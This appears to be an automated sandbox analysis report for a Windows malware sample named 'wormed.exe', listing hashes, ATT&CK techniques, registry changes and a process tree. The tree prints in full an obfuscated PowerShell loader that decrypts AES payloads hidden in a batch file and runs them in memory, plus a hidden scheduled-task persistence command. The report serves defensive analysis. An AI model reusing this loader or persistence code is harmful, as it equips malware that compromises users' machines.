4586171aaa7b979eb0ea39fc7b1ad4291d0b760907ed783377f9a18dd0e61fea

Analysis

max time kernel
94s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01/10/2024, 22:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wormed.exe
Size

528KB
MD5

af61f44fba1f7ca02d8fbcefa820345a
SHA1

06a67aa103a745bfcfbb53bc44a0de4ef98ce5fd
SHA256

4586171aaa7b979eb0ea39fc7b1ad4291d0b760907ed783377f9a18dd0e61fea
SHA512

1b5767f145e64bf07a118bf6d8f87cf203180a9a9b4f07fcc303bca68878d74378e71df5eff9b2d3ea19e80fdd66ba87ab53c4d539c88c96e463a7bdf3100007
SSDEEP

12288:ueRtBEy90jzpjgDXtUbxC04XfaJ2Eitl8lDbgdCRgVD/g75ioG:JjEyYzpjgba1CDXf4S8VACRj7UX

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2368	powershell.exe
548	powershell.exe
1372	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	wormed.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2368	powershell.exe
2368	powershell.exe
548	powershell.exe
548	powershell.exe
1372	powershell.exe
1372	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeIncreaseQuotaPrivilege	548	powershell.exe
Token: SeSecurityPrivilege	548	powershell.exe
Token: SeTakeOwnershipPrivilege	548	powershell.exe
Token: SeLoadDriverPrivilege	548	powershell.exe
Token: SeSystemProfilePrivilege	548	powershell.exe
Token: SeSystemtimePrivilege	548	powershell.exe
Token: SeProfSingleProcessPrivilege	548	powershell.exe
Token: SeIncBasePriorityPrivilege	548	powershell.exe
Token: SeCreatePagefilePrivilege	548	powershell.exe
Token: SeBackupPrivilege	548	powershell.exe
Token: SeRestorePrivilege	548	powershell.exe
Token: SeShutdownPrivilege	548	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeSystemEnvironmentPrivilege	548	powershell.exe
Token: SeRemoteShutdownPrivilege	548	powershell.exe
Token: SeUndockPrivilege	548	powershell.exe
Token: SeManageVolumePrivilege	548	powershell.exe
Token: 33	548	powershell.exe
Token: 34	548	powershell.exe
Token: 35	548	powershell.exe
Token: 36	548	powershell.exe
Token: SeIncreaseQuotaPrivilege	548	powershell.exe
Token: SeSecurityPrivilege	548	powershell.exe
Token: SeTakeOwnershipPrivilege	548	powershell.exe
Token: SeLoadDriverPrivilege	548	powershell.exe
Token: SeSystemProfilePrivilege	548	powershell.exe
Token: SeSystemtimePrivilege	548	powershell.exe
Token: SeProfSingleProcessPrivilege	548	powershell.exe
Token: SeIncBasePriorityPrivilege	548	powershell.exe
Token: SeCreatePagefilePrivilege	548	powershell.exe
Token: SeBackupPrivilege	548	powershell.exe
Token: SeRestorePrivilege	548	powershell.exe
Token: SeShutdownPrivilege	548	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeSystemEnvironmentPrivilege	548	powershell.exe
Token: SeRemoteShutdownPrivilege	548	powershell.exe
Token: SeUndockPrivilege	548	powershell.exe
Token: SeManageVolumePrivilege	548	powershell.exe
Token: 33	548	powershell.exe
Token: 34	548	powershell.exe
Token: 35	548	powershell.exe
Token: 36	548	powershell.exe
Token: SeIncreaseQuotaPrivilege	548	powershell.exe
Token: SeSecurityPrivilege	548	powershell.exe
Token: SeTakeOwnershipPrivilege	548	powershell.exe
Token: SeLoadDriverPrivilege	548	powershell.exe
Token: SeSystemProfilePrivilege	548	powershell.exe
Token: SeSystemtimePrivilege	548	powershell.exe
Token: SeProfSingleProcessPrivilege	548	powershell.exe
Token: SeIncBasePriorityPrivilege	548	powershell.exe
Token: SeCreatePagefilePrivilege	548	powershell.exe
Token: SeBackupPrivilege	548	powershell.exe
Token: SeRestorePrivilege	548	powershell.exe
Token: SeShutdownPrivilege	548	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeSystemEnvironmentPrivilege	548	powershell.exe
Token: SeRemoteShutdownPrivilege	548	powershell.exe
Token: SeUndockPrivilege	548	powershell.exe
Token: SeManageVolumePrivilege	548	powershell.exe
Token: 33	548	powershell.exe
Token: 34	548	powershell.exe
Token: 35	548	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 5016	1612	wormed.exe	83
PID 1612 wrote to memory of 5016	1612	wormed.exe	83
PID 5016 wrote to memory of 2368	5016	cmd.exe	85
PID 5016 wrote to memory of 2368	5016	cmd.exe	85
PID 2368 wrote to memory of 548	2368	powershell.exe	86
PID 2368 wrote to memory of 548	2368	powershell.exe	86
PID 2368 wrote to memory of 956	2368	powershell.exe	89
PID 2368 wrote to memory of 956	2368	powershell.exe	89
PID 956 wrote to memory of 516	956	WScript.exe	90
PID 956 wrote to memory of 516	956	WScript.exe	90
PID 516 wrote to memory of 1372	516	cmd.exe	92
PID 516 wrote to memory of 1372	516	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\wormed.exe
"C:\Users\Admin\AppData\Local\Temp\wormed.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c "wormed.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1m+scAtgHERBWpmGN/xdVYOQ1IMDosVyUHWaFnbrBOU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jq8I02TSdae1RQtl5nzl2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fIINJ=New-Object System.IO.MemoryStream(,$param_var); $WCqKY=New-Object System.IO.MemoryStream; $ENUag=New-Object System.IO.Compression.GZipStream($fIINJ, [IO.Compression.CompressionMode]::Decompress); $ENUag.CopyTo($WCqKY); $ENUag.Dispose(); $fIINJ.Dispose(); $WCqKY.Dispose(); $WCqKY.ToArray();}function execute_function($param_var,$param2_var){ $ZdGKa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xDoOM=$ZdGKa.EntryPoint; $xDoOM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wormed.bat';$OZcHA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wormed.bat').Split([Environment]::NewLine);foreach ($HBYSl in $OZcHA) { if ($HBYSl.StartsWith(':: ')) { $QfalR=$HBYSl.Substring(3); break; }}$payloads_var=[string[]]$QfalR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_209_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_209.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:548
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_209.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_209.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:516
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1m+scAtgHERBWpmGN/xdVYOQ1IMDosVyUHWaFnbrBOU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jq8I02TSdae1RQtl5nzl2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fIINJ=New-Object System.IO.MemoryStream(,$param_var); $WCqKY=New-Object System.IO.MemoryStream; $ENUag=New-Object System.IO.Compression.GZipStream($fIINJ, [IO.Compression.CompressionMode]::Decompress); $ENUag.CopyTo($WCqKY); $ENUag.Dispose(); $fIINJ.Dispose(); $WCqKY.Dispose(); $WCqKY.ToArray();}function execute_function($param_var,$param2_var){ $ZdGKa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xDoOM=$ZdGKa.EntryPoint; $xDoOM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_209.bat';$OZcHA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_209.bat').Split([Environment]::NewLine);foreach ($HBYSl in $OZcHA) { if ($HBYSl.StartsWith(':: ')) { $QfalR=$HBYSl.Substring(3); break; }}$payloads_var=[string[]]$QfalR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f8d49a4af7a844bfc7247d5670def557

SHA1
26ae0ce194a77a7a1887cf93741293fdfa6c94c4

SHA256
61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

SHA512
9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wormed.bat

Filesize
487KB

MD5
1713ec0c42c11ce8a0b6895e45a4a7b5

SHA1
10cceb6fa8e07dc30fbe15d836f2a16d2923f620

SHA256
8ab16526182618ff4130162a12de232ba85e40bc37b5a94b7ba8afc1ca25faa1

SHA512
1acd3d58cdf82fe1e3b9c65ac953ddbe3171b477e9846af64f000285f207aa5294a2c3297dec754b2cc84076d19aa92a3d37bd17dd1406f71cd5fc141889fcf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qcbtzrci.ojd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_209.vbs

Filesize
115B

MD5
426da06aa2bd5925d1ca93f1699d4fc0

SHA1
41b529503b3038a03fe37fe3c6d06ced00817dc5

SHA256
9356e712fdcf81d2e1f888740f204d899b0bfb9a513271e2153fe9823ed371d9

SHA512
8d933185a9b8f5535886e191d6e727b99f09fe50c775e78f3d3daa45ff087e2ce95375f3e41cb73ceccd36ccde493d97c2de1e294ce5e1b583280c534587b339

Download Submit
memory/1372-48-0x000001AD8B940000-0x000001AD8C940000-memory.dmp

Filesize
16.0MB

Download
memory/2368-14-0x00007FFAEEF80000-0x00007FFAEFA41000-memory.dmp

Filesize
10.8MB

Download
memory/2368-15-0x00007FFAEEF80000-0x00007FFAEFA41000-memory.dmp

Filesize
10.8MB

Download
memory/2368-16-0x0000016830510000-0x0000016830518000-memory.dmp

Filesize
32KB

Download
memory/2368-17-0x000001684AAA0000-0x000001684AAFE000-memory.dmp

Filesize
376KB

Download
memory/2368-4-0x000001684A830000-0x000001684A852000-memory.dmp

Filesize
136KB

Download
memory/2368-3-0x00007FFAEEF83000-0x00007FFAEEF85000-memory.dmp

Filesize
8KB

Download
memory/2368-49-0x00007FFAEEF80000-0x00007FFAEFA41000-memory.dmp

Filesize
10.8MB

Download